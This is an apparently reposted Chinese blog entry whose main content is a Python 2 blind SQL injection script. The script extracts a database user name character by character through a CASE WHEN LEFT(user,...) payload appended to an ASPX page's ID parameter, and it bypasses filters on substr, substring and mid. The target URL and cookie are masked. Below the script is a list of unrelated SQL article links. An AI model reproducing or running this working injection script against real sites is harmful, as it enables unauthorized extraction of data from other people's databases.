禁用substr、substring、mid函数的sql注入脚本
2016-04-13 16:39
316 查看
变懒了啊···
#encodeing=utf-8
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
headers = {
'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'*****************************************'
}
print "test..."
user=""
for i in range(1,7):
for payload in payloads:
user+=payload
aaa="--"
d="(case when (left(user,%s))='%s' then 1 else 0 end)" % (i,user)
test = d + aaa
r=requests.get('http://**********/******.aspx?ID=203263/'+test,headers=headers)
if r.status_code==200:
print user
break
else:
user=user[:-1]
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 数据库分页技术大全(超级经典)
- 专门查看阻塞和死锁情况以及引起的SQL语句,你可以创建后,直接运行之。
- MySQL 锁、事务隔离级别
- MYSQL 解锁与锁表
- show profile的使用
- Sybase 基础SQL查询
- Oracle正则表达式替换字符串
- SQLite语句
- MSSQL
- mysql odbc 5.3 install error 13: system error code 126
- oracle10g的em工具优化sql功能
- SQL
- Oracle定义DES加密解密及MD5加密函数示例
- mysql 查询的时候处理中文汉字按照字母排序问题
- MySql【Insert Select Not Exist】判断记录再添加值的方案
- Oracle Study之-Oracle 11g OCM考试(2)
- oracle学习笔记 oracle软件安装和数据库的创建
- sqlserver中的bcp查询导出海量数据
- Redis学习_01 windows下的环境搭建
- 监控SQL